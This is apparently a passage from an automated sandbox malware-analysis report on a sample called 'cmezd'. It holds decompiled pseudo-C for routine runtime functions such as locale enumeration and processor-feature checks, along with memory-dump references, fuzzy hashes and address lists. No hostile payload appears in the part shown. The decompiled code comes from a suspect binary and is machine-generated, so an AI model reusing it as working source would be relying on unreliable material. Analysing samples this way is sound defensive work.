                                                                                              0x01353d61
                                                                                              0x01353d67
                                                                                              0x01353d6a
                                                                                              0x01353d74
                                                                                              0x01353d7f
                                                                                              0x01353d8b
                                                                                              0x01353d8e
                                                                                              0x01353d91
                                                                                              0x01353d9c
                                                                                              0x01353da1
                                                                                              0x01353da3
                                                                                              0x01353da8
                                                                                              0x01353dab
                                                                                              0x01353db5
                                                                                              0x01353dbd
                                                                                              0x01353dc2
                                                                                              0x01353dcc
                                                                                              0x01353dda
                                                                                              0x01353ded
                                                                                              0x01353df4
                                                                                              0x01353df4
                                                                                              0x01353dda
                                                                                              0x01353dbd
                                                                                              0x01353da1
                                                                                              0x01353d7f
                                                                                              0x00000000
                                                                                              0x01353dfc
                                                                                              0x01353cbd
                                                                                              0x01353cc7
                                                                                              0x01353cf2
                                                                                              0x01353cf5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 01353C43
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              • Opcode ID: eda6cda76b64d9c056989a0a31a4c55e88ea92f8df3b9434eb05c8d5900caaee
                                                                                              • Instruction ID: b64fc9a5735ababb5cdd959b7bae249dd87dc51800fafcfc42179e756efd49e6
                                                                                              • Opcode Fuzzy Hash: eda6cda76b64d9c056989a0a31a4c55e88ea92f8df3b9434eb05c8d5900caaee
                                                                                              • Instruction Fuzzy Hash: 0551A171E012058FEB29CF59D4C1BAABBF8FB48758F24816AC905EB245D376DA40CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01369A44 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 91%
                                                                                              			E01369A44(void* __ecx, void* __edx, signed int* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				intOrPtr* _t38;
				intOrPtr* _t41;
				signed int _t47;
				void* _t50;
				void* _t51;
				signed int* _t52;
				void* _t53;
				void* _t54;
				signed int _t62;

				_t54 = E0136373A(__ecx, __edx, _t53);
				_t47 = 2;
				_t38 =  *((intOrPtr*)(_t54 + 0x50));
				_t50 = _t38 + 2;
				do {
					_t26 =  *_t38;
					_t38 = _t38 + _t47;
				} while (_t26 != 0);
				_t41 =  *((intOrPtr*)(_t54 + 0x54));
				 *(_t54 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
				_t51 = _t41 + 2;
				do {
					_t29 =  *_t41;
					_t41 = _t41 + _t47;
				} while (_t29 != 0);
				_t52 = _a4;
				 *(_t54 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
				_t52[1] = 0;
				if( *(_t54 + 0x60) == 0) {
					_t47 = E0136A13E( *((intOrPtr*)(_t54 + 0x50)));
				}
				 *(_t54 + 0x5c) = _t47;
				_t32 = EnumSystemLocalesW(0x1369adf, 1);
				_t62 =  *_t52 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t52 = 0;
					return _t34;
				}
				return _t34;
			}



















                                                                                              0x01369a51
                                                                                              0x01369a57
                                                                                              0x01369a58
                                                                                              0x01369a5b
                                                                                              0x01369a5e
                                                                                              0x01369a5e
                                                                                              0x01369a61
                                                                                              0x01369a63
                                                                                              0x01369a71
                                                                                              0x01369a77
                                                                                              0x01369a7a
                                                                                              0x01369a7d
                                                                                              0x01369a7d
                                                                                              0x01369a80
                                                                                              0x01369a82
                                                                                              0x01369a8b
                                                                                              0x01369a96
                                                                                              0x01369a99
                                                                                              0x01369a9f
                                                                                              0x01369aaa
                                                                                              0x01369aaa
                                                                                              0x01369ab3
                                                                                              0x01369ab6
                                                                                              0x01369abe
                                                                                              0x01369ac4
                                                                                              0x01369ac8
                                                                                              0x01369acd
                                                                                              0x01369ad1
                                                                                              0x01369ad6
                                                                                              0x01369ad8
                                                                                              0x00000000
                                                                                              0x01369ad8
                                                                                              0x01369ade

                                                                                              APIs
                                                                                                • Part of subcall function 0136373A: GetLastError.KERNEL32(?,00000008,0136545D), ref: 0136373E
                                                                                                • Part of subcall function 0136373A: SetLastError.KERNEL32(00000000,00000000,00000007,000000FF), ref: 013637E0
                                                                                              • EnumSystemLocalesW.KERNEL32(01369ADF,00000001,00000000,?,-00000050,?,013698CE,00000000,-00000002,00000000,?,00000055,?), ref: 01369AB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2417226690-0
                                                                                              • Opcode ID: ee88b679ae66ae27849a00b6562a13d1c115b42e22a4d9f8fc4568f6fbc01162
                                                                                              • Instruction ID: 660d79e155c9962ac86b5c6324700dcf47bcb266e67c27d7a6d758c6e32c335d
                                                                                              • Opcode Fuzzy Hash: ee88b679ae66ae27849a00b6562a13d1c115b42e22a4d9f8fc4568f6fbc01162
                                                                                              • Instruction Fuzzy Hash: F711E93A2007055FEF18AF39C89167AB7D6FF8035CB14842DD94647644D775B943C740
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01369D32 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E01369D32(void* __ecx, void* __edx, signed char* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t11;
				signed char* _t15;
				intOrPtr* _t19;
				intOrPtr _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = E0136373A(__ecx, __edx, _t26);
				_t24 = 2;
				_t19 =  *((intOrPtr*)(_t27 + 0x50));
				_t25 = _t19 + 2;
				do {
					_t11 =  *_t19;
					_t19 = _t19 + _t24;
				} while (_t11 != 0);
				_t4 = _t19 - _t25 >> 1 == 3;
				 *(_t27 + 0x60) = 0 | _t4;
				if(_t4 != 0) {
					_t24 = E0136A13E( *((intOrPtr*)(_t27 + 0x50)));
				}
				 *((intOrPtr*)(_t27 + 0x5c)) = _t24;
				EnumSystemLocalesW(0x1369d91, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}












                                                                                              0x01369d3f
                                                                                              0x01369d45
                                                                                              0x01369d46
                                                                                              0x01369d49
                                                                                              0x01369d4c
                                                                                              0x01369d4c
                                                                                              0x01369d4f
                                                                                              0x01369d51
                                                                                              0x01369d5f
                                                                                              0x01369d62
                                                                                              0x01369d65
                                                                                              0x01369d70
                                                                                              0x01369d70
                                                                                              0x01369d79
                                                                                              0x01369d7c
                                                                                              0x01369d82
                                                                                              0x01369d88
                                                                                              0x01369d8a
                                                                                              0x00000000
                                                                                              0x01369d8a
                                                                                              0x01369d90

                                                                                              APIs
                                                                                                • Part of subcall function 0136373A: GetLastError.KERNEL32(?,00000008,0136545D), ref: 0136373E
                                                                                                • Part of subcall function 0136373A: SetLastError.KERNEL32(00000000,00000000,00000007,000000FF), ref: 013637E0
                                                                                              • EnumSystemLocalesW.KERNEL32(01369D91,00000001,?,?,-00000050,?,01369892,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 01369D7C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2417226690-0
                                                                                              • Opcode ID: b91423ac044c9af1b66ace3f754003f2ad3b7775f8a925ec69e0d5ab18e22499
                                                                                              • Instruction ID: b6d1fe70963f71edf5870c750eb3bb56a53201d338f019ec613515de1b3972a7
                                                                                              • Opcode Fuzzy Hash: b91423ac044c9af1b66ace3f754003f2ad3b7775f8a925ec69e0d5ab18e22499
                                                                                              • Instruction Fuzzy Hash: CFF0C2362003045FDB256F39D881B6ABB99EB8176CF05C43DEA454B684C67198028750
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01363594 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 83%
                                                                                              			E01363594(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				signed int _t29;
				void* _t31;

				_push(0xc);
				_push(0x139d700);
				E01353A50(__ebx, __edi, __esi);
				 *(_t31 - 0x1c) =  *(_t31 - 0x1c) & 0x00000000;
				E01363682( *((intOrPtr*)( *((intOrPtr*)(_t31 + 8)))));
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				 *0x13a0c40 = E01355057( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)))))));
				_t29 = EnumSystemLocalesW(E01363532, 1);
				_t17 =  *0x139e210; // 0x1911783b
				 *0x13a0c40 = _t17;
				 *(_t31 - 0x1c) = _t29;
				 *(_t31 - 4) = 0xfffffffe;
				E01363604();
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0x10));
				return _t29;
			}






                                                                                              0x01363594
                                                                                              0x01363596
                                                                                              0x0136359b
                                                                                              0x013635a0
                                                                                              0x013635a9
                                                                                              0x013635af
                                                                                              0x013635c0
                                                                                              0x013635d2
                                                                                              0x013635d4
                                                                                              0x013635d9
                                                                                              0x013635de
                                                                                              0x013635e1
                                                                                              0x013635e8
                                                                                              0x013635f2
                                                                                              0x013635fe

                                                                                              APIs
                                                                                                • Part of subcall function 01363682: EnterCriticalSection.KERNEL32(-013A0C48,?,01357D3F,?,0139D528,0000000C,01357A4C,?), ref: 01363691
                                                                                              • EnumSystemLocalesW.KERNEL32(01363532,00000001,0139D700,0000000C,01362701,-00000050), ref: 013635CC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1272433827-0
                                                                                              • Opcode ID: eca51d14f8c63439a2e61cf19d35b54990a7949ff3346a515bae0441c9d1b5f1
                                                                                              • Instruction ID: 9cbfe5b0f4f8e30cd804b0fbf90308896f32508eb44747736d85ebe6b401be8e
                                                                                              • Opcode Fuzzy Hash: eca51d14f8c63439a2e61cf19d35b54990a7949ff3346a515bae0441c9d1b5f1
                                                                                              • Instruction Fuzzy Hash: 43F049B2A40301EFDB24EF98E442B9D77F4FB18729F10812AE8159B390CB7699008F50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01369E66 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E01369E66(void* __ecx, void* __edx, signed char* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				intOrPtr* _t15;
				void* _t19;
				void* _t21;
				void* _t22;

				_t19 = E0136373A(__ecx, __edx, _t21);
				_t15 =  *((intOrPtr*)(_t19 + 0x54));
				_t22 = _t15 + 2;
				do {
					_t9 =  *_t15;
					_t15 = _t15 + 2;
				} while (_t9 != 0);
				 *(_t19 + 0x64) = 0 | _t15 - _t22 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0x1369eb1, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}











                                                                                              0x01369e72
                                                                                              0x01369e76
                                                                                              0x01369e79
                                                                                              0x01369e7c
                                                                                              0x01369e7c
                                                                                              0x01369e7f
                                                                                              0x01369e82
                                                                                              0x01369e9a
                                                                                              0x01369e9d
                                                                                              0x01369ea3
                                                                                              0x01369ea9
                                                                                              0x01369eab
                                                                                              0x00000000
                                                                                              0x01369eab
                                                                                              0x01369eb0

                                                                                              APIs
                                                                                                • Part of subcall function 0136373A: GetLastError.KERNEL32(?,00000008,0136545D), ref: 0136373E
                                                                                                • Part of subcall function 0136373A: SetLastError.KERNEL32(00000000,00000000,00000007,000000FF), ref: 013637E0
                                                                                              • EnumSystemLocalesW.KERNEL32(01369EB1,00000001,?,?,?,013698F0,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 01369E9D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2417226690-0
                                                                                              • Opcode ID: 27dec0b14b981902521a7ba7bf0ea048805a9c4b85e4594adb65edb2dd39541e
                                                                                              • Instruction ID: 707a81432b27163e8aca652474dcf71e5d28c2b04794fc1d1ff03765abf41851
                                                                                              • Opcode Fuzzy Hash: 27dec0b14b981902521a7ba7bf0ea048805a9c4b85e4594adb65edb2dd39541e
                                                                                              • Instruction Fuzzy Hash: A7F0E53A3002055BCF15AF39DC55B6ABFA8EFC172CB068059EE098B359C6769943C790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01362890 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,01357010,?,20001004,00000000,00000002,?,?,01355D24), ref: 013628C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              • Opcode ID: ddb0c712c1d4b9a3c0f05363029b0ed7d282e8dcb7d52c66f2ff6eee6d26ea2f
                                                                                              • Instruction ID: 0497d67059ccc8877d896060c56f7097eb51aa8e1303b8f8bc35ef128aebb5fa
                                                                                              • Opcode Fuzzy Hash: ddb0c712c1d4b9a3c0f05363029b0ed7d282e8dcb7d52c66f2ff6eee6d26ea2f
                                                                                              • Instruction Fuzzy Hash: 30E04F3254011CBBDF226F64DD04AAF3F2EFF54761F018024FD0665114CB768921ABE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013634D5 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E013634D5(intOrPtr _a4) {
				int _t3;
				intOrPtr _t5;

				 *0x13a0c40 = E01355057(_a4);
				_t3 = EnumSystemLocalesW(E01363532, 1);
				_t5 =  *0x139e210; // 0x1911783b
				 *0x13a0c40 = _t5;
				return _t3;
			}





                                                                                              0x013634ea
                                                                                              0x013634ef
                                                                                              0x013634f5
                                                                                              0x013634fb
                                                                                              0x01363502

                                                                                              APIs
                                                                                              • EnumSystemLocalesW.KERNEL32(01363532,00000001), ref: 013634EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnumLocalesSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2099609381-0
                                                                                              • Opcode ID: fbdb3545f175759704fd4da4052627844fcc74763e67dae5b18dae56bd9a402c
                                                                                              • Instruction ID: 93861c67f9d17b3339a9abf207d090ed420d8e756bfbefe53aa6856448c612fe
                                                                                              • Opcode Fuzzy Hash: fbdb3545f175759704fd4da4052627844fcc74763e67dae5b18dae56bd9a402c
                                                                                              • Instruction Fuzzy Hash: A0D09275584344ABDB38AF61F84A9153B6DF790B54F50442AF91E0B288EBB3A9418B80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013628CF Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              • GetSystemTimePreciseAsFileTime, xrefs: 013628DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: GetSystemTimePreciseAsFileTime
                                                                                              • API String ID: 0-595813830
                                                                                              • Opcode ID: 56b107f2d92ad44b56df594fea6a56739e4a657d4c06bc659ee318436b0e0181
                                                                                              • Instruction ID: 513ecf7ebc46c570e4226b3e28467dfcd46dd114d934cb3d7728513354908b79
                                                                                              • Opcode Fuzzy Hash: 56b107f2d92ad44b56df594fea6a56739e4a657d4c06bc659ee318436b0e0181
                                                                                              • Instruction Fuzzy Hash: BDE0C2327C022D63D73026966C06EABBE8DE780BF5F084065FA09652059AA20861C2D0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0095017B Relevance: .1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263303661.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_950000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                              • Instruction ID: 75e41629aed77712f6c59e93cde302ef22e542357b2789a440ba7b22ea6d0f5f
                                                                                              • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                              • Instruction Fuzzy Hash: CE11C236604119AFC720EF6AC8809AEB7EDEF947A5B048015FC54CB210E334ED85C754
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01365F83 Relevance: .0, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 81%
                                                                                              			E01365F83(void* __ecx) {
				char _v8;
				intOrPtr _t9;
				void* _t11;
				void* _t13;
				char _t21;

				_t21 =  *0x13a1010;
				if(_t21 == 0) {
					_t21 = 2;
					_v8 = _t21;
					_t9 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t25 =  *((intOrPtr*)(_t9 + 8));
					if( *((intOrPtr*)(_t9 + 8)) >= 0) {
						E01362D1B(_t25,  &_v8);
					}
					_t11 = _v8 - 1;
					if(_t11 != 0) {
						_t13 = _t11 - 1;
						if(_t13 == 0) {
							_t21 = 1;
							__eflags = 1;
						} else {
							if(_t13 == 1) {
								_push(3);
							} else {
								_push(4);
							}
							_pop(_t21);
						}
					}
					 *0x13a1010 = _t21;
				}
				return _t21;
			}








                                                                                              0x01365f8a
                                                                                              0x01365f93
                                                                                              0x01365f9d
                                                                                              0x01365f9e
                                                                                              0x01365fa1
                                                                                              0x01365fa4
                                                                                              0x01365fa8
                                                                                              0x01365fae
                                                                                              0x01365fae
                                                                                              0x01365fb6
                                                                                              0x01365fb9
                                                                                              0x01365fbb
                                                                                              0x01365fbe
                                                                                              0x01365fd0
                                                                                              0x01365fd0
                                                                                              0x01365fc0
                                                                                              0x01365fc3
                                                                                              0x01365fc9
                                                                                              0x01365fc5
                                                                                              0x01365fc5
                                                                                              0x01365fc5
                                                                                              0x01365fcb
                                                                                              0x01365fcb
                                                                                              0x01365fbe
                                                                                              0x01365fd8
                                                                                              0x01365fd8
                                                                                              0x01365fde

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 061b2d954687ba2574bf64330cac0b04d2bb7eaf767381a2d4b772979ae1efe7
                                                                                              • Instruction ID: 320a5cf9f3124976c7eaa67a76c297a74989632a29c1b70b31735b2028288971
                                                                                              • Opcode Fuzzy Hash: 061b2d954687ba2574bf64330cac0b04d2bb7eaf767381a2d4b772979ae1efe7
                                                                                              • Instruction Fuzzy Hash: 6DF0B432684224EBD726CA5CC619F55B7ACE706B98F118172F201DF69CC6B0EE04C7C0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0136611A Relevance: .0, Instructions: 38COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 78%
                                                                                              			E0136611A(void* __ecx, char _a4) {
				char _v8;
				intOrPtr _t8;
				intOrPtr _t11;
				void* _t13;
				void* _t15;

				_t8 =  *0x13a1010;
				if(_t8 != 0) {
					return _t8;
				}
				_v8 = _a4;
				_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t25 =  *((intOrPtr*)(_t11 + 8));
				if( *((intOrPtr*)(_t11 + 8)) >= 0) {
					E01362D1B(_t25,  &_v8);
				}
				_t13 = _v8 - 1;
				if(_t13 == 0) {
					_push(2);
					goto L10;
				} else {
					_t15 = _t13 - 1;
					if(_t15 == 0) {
						L11:
						 *0x13a1010 = 1;
						return 1;
					}
					if(_t15 == 1) {
						_push(3);
					} else {
						_push(4);
					}
					L10:
					_pop(1);
					goto L11;
				}
			}








                                                                                              0x01366120
                                                                                              0x01366128
                                                                                              0x01366174
                                                                                              0x01366174
                                                                                              0x0136612d
                                                                                              0x01366136
                                                                                              0x01366139
                                                                                              0x0136613d
                                                                                              0x01366143
                                                                                              0x01366143
                                                                                              0x0136614b
                                                                                              0x0136614e
                                                                                              0x01366167
                                                                                              0x00000000
                                                                                              0x01366150
                                                                                              0x01366150
                                                                                              0x01366153
                                                                                              0x0136616a
                                                                                              0x01366171
                                                                                              0x00000000
                                                                                              0x01366171
                                                                                              0x01366158
                                                                                              0x0136615e
                                                                                              0x0136615a
                                                                                              0x0136615a
                                                                                              0x0136615a
                                                                                              0x01366169
                                                                                              0x01366169
                                                                                              0x00000000
                                                                                              0x01366169

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
